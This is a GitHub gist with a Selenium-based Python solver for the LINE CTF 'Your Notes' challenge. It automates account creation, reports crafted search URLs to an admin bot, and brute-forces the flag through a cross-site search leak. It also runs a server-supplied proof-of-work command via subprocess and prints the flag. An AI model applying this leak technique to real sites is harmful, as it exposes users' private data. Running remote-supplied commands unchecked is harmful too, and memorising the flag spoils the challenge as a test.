Skip to content

Instantly share code, notes, and snippets.

@jorgectf
Last active March 21, 2021 01:41
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save jorgectf/922df24afccf3f1401b4110d24a17789 to your computer and use it in GitHub Desktop.
Line's CTF Your Notes solver.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string, subprocess
def random_string(length):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
options = webdriver.FirefoxOptions()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
# driver = webdriver.Remote("HUB_URL", options=options)
driver = webdriver.Firefox(options=options)
chall_url = "http://34.84.94.138" # Change this
def create_account():
username, password = random_string(10), random_string(10)
print(f"Creating {username}:{password}")
driver.get(chall_url + "/register")
for i in range(2):
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.NAME, "username")))
driver.find_element_by_name("username").send_keys(username)
driver.find_element_by_name("password").send_keys(password)
driver.find_element_by_xpath("//button[@type='submit']").click()
def new_note(title, content):
driver.find_element_by_xpath("//a[contains(@href,'note')]").click()
driver.find_element_by_name("title").send_keys(title)
driver.find_element_by_name("content").send_keys(content)
driver.find_element_by_xpath("//button[@type='submit']").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.XPATH, "//h3[contains(@class,'title')]")))
def report(url):
while True:
print(f"Reporting {url}...")
driver.get(chall_url + "/report")
if "login" in driver.current_url:
print("Relogging")
create_account()
continue
try:
WebDriverWait(driver, 60).until(ec.element_to_be_clickable((By.NAME, "url")))
except:
continue
driver.find_element_by_name("url").send_keys(url)
proof = driver.find_element_by_xpath("/html/body/div/div/div/div[1]/form/div[4]/p[2]/strong").text.split("\n")[1].split(" ")
print(f"Calculating nonce... {proof}")
proof = subprocess.check_output(proof).decode()
print(f"Proof is {proof}")
driver.find_element_by_name("proof").send_keys(proof)
driver.find_element_by_xpath("/html/body/div/div/div/div[1]/form/div[3]/p/button").click()
try:
WebDriverWait(driver, 60).until(ec.element_to_be_clickable((By.XPATH, "/html/body/div/div/div/div[1]/form/div[5]")))
except:
continue
if "Thank" in driver.find_element_by_xpath("/html/body/div/div/div/div[1]/form/div[5]").text:
return False
else:
return True
create_account()
known = "LINECTF{1-kn0w-what-y0u-d0wn10ad}"
charset = "}" + "-" + string.ascii_lowercase + string.digits
index = 0
while known[-1] != "}":
url = f"{chall_url}/search?q={known}{charset[index]}&download="
print(f"Trying {known}{charset[index]} - {index}")
if report(url):
known += charset[index]
print(f"Found {known}")
if index == len(charset)-1:
index = 0
else:
index +=1
driver.close()
driver.quit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment